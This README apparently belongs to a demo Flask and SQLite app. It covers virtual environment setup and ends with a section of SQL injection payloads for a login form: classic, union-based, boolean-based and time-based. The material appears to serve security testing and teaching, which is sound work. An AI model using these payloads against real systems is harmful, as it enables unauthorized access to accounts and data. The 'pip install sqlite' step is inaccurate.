Demo Project

This README provides step-by-step instructions for setting up a Python virtual environment across different operating systems. The guide also includes additional tips for working with Flask and SQLite.

Table of Contents

1. Setting Up a Virtual Environment
2. Activating the Virtual Environment
3. Working with Flask
4. Working with SQLite
5. Testing SQL Injections

Setting Up a Virtual Environment

Windows

1. Open Command Prompt: Press Windows + R, type cmd, and hit Enter.
2. Navigate to Project Directory: Use the cd command to navigate to your project folder.
3. Create Virtual Environment:

   python -m venv env

macOS and Linux

1. Open Terminal: Open it from the Applications folder or search for it using Spotlight (Cmd + Space).
2. Navigate to Project Directory: Use the cd command to go to your project folder.
3. Create Virtual Environment:

   python3 -m venv env

Activating the Virtual Environment

Windows

1. Activate Virtual Environment:

   .\env\Scripts\Activate

macOS and Linux

1. Activate Virtual Environment:

   source env/bin/activate

Working with Flask

1. Install Flask:

   pip install Flask

2. Run Flask Application:

   flask run

Working with SQLite

1. Install SQLite:

   pip install sqlite

2. Initialize Database:

   python init_db.py

Testing SQL Injections

Classic SQL Injection

1. Username:

   ' OR '1'='1

2. Password:

   ' OR '1'='1

Union-based SQL Injection

SQLite doesn't allow multiple statements in a single SQL query, which limits the types of UNION queries you can perform. However, you can still test basic UNION-based SQL injections.

1. Username:

   ' UNION SELECT NULL, 'a', 'b' --

2. Password:

   Leave it blank

Boolean-based SQL Injection

1. Username:

   ' OR '1'='1

2. Password:

   ' OR '1'='2

Time-based Blind SQL Injection

SQLite does not have built-in sleep functions, but for databases that do (like MySQL), you could use payloads like:

1. Username:

   ' OR IF('1'='1', sleep(10), 0) --

2. Password:

   Leave it blank